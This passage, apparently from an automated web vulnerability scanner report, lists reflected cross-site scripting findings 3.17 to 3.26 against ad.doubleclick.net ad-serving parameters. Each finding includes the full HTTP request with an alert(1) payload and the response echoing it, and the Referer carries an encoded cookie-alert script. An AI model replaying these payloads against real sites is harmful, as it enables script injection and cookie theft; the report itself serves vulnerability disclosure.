Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:27:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5940

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Feb 03 04:31:52 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/7e/%2a/m%3B235905438%3B0-0%3B0%3B59689842%3B2321-160/600%3B40558590/40576377/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=1400935007252718955b7ca'-alert(1)-'06a06d14574&mt_id=109456&mt_adid=100293&redirect=http%3a%2f%2fwww.proactiv.com/lp/em_overnight/%3Fuci%3DUS-PA-O-DI-OM-2297\">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ada57'-alert(1)-'9f353877624 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76ada57'-alert(1)-'9f353877624&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94135"-alert(1)-"27645e01241 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=7694135"-alert(1)-"27645e01241&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = fa
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf570'-alert(1)-'8d2303ed4ad was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149bf570'-alert(1)-'8d2303ed4ad&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5f5"-alert(1)-"86f22d1910e was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=1031492e5f5"-alert(1)-"86f22d1910e&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd383'-alert(1)-'ea723a23d73 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295bd383'-alert(1)-'ea723a23d73&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8cec"-alert(1)-"2cdbd4fd8f3 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295a8cec"-alert(1)-"2cdbd4fd8f3&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
va
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfcbc"-alert(1)-"87f30d13f was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6038
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=dfcbc"-alert(1)-"87f30d13fhttp%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

3.24. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db6b7'-alert(1)-'41e11d4dca9 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6046
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:29:00 GMT
Expires: Mon, 07 Feb 2011 02:29:00 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=db6b7'-alert(1)-'41e11d4dca9http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

3.25. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 851cf'-alert(1)-'7daf788badb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=60685033116147109851cf'-alert(1)-'7daf788badb&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR\">
...[SNIP]...

3.26. http://ad.doubleclick.net/adj/N6010.133090.MEDIAMATH/B4632508.2 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6010.133090.MEDIAMATH/B4632508.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62064"-alert(1)-"db102385c04 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6010.133090.MEDIAMATH/B4632508.2;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=60685033116147109? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/728x90/thechive_us?t=1297045705115&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6046

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Dec 17 10:10:39 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
